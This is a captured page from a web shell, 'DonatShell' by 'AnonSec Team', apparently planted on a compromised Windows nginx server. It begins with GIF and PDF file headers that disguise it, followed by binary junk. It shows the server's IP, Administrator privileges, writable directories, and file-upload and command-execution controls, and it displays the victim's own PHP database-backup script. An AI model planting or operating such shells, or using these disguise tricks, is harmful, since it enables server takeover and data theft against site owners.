GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/admin/database/backup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/admin/database/backup/downloadSQL.phpinc
<?
// admin/database/backup/downloadSQL.phpinc
// Download backup to the user.

t_Begin(); // Begin TRACKing include_filename.phpinc.

$path_to_backup_folder=osPath($_SESSION['ROOT']['directory'].'/site/_backup/'); // Path to database backups.
$now = currentDateTime();
#echo '['.$now.']<br>';
$nowParts = explode(' ',$now);
$downloadFilename = 'scheduler_'.$nowParts[0].'_'.str_replace(':','.',$nowParts[1]).'.sql';
#exit;


#d_V(false,'d');
header('Content-Type: application/octet-stream');   
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"".$downloadFilename."\"");
/** /
d_V(false.'d');
echo '['.$downloadFilename.']<br>';
/**/
require($path_to_backup_folder.$f['filename']);
exit;

t_End(); // End TRACKing include_filename.phpinc.  [2023-04-12 11:07:05]
?>

Anon7 - 2022
AnonSec Team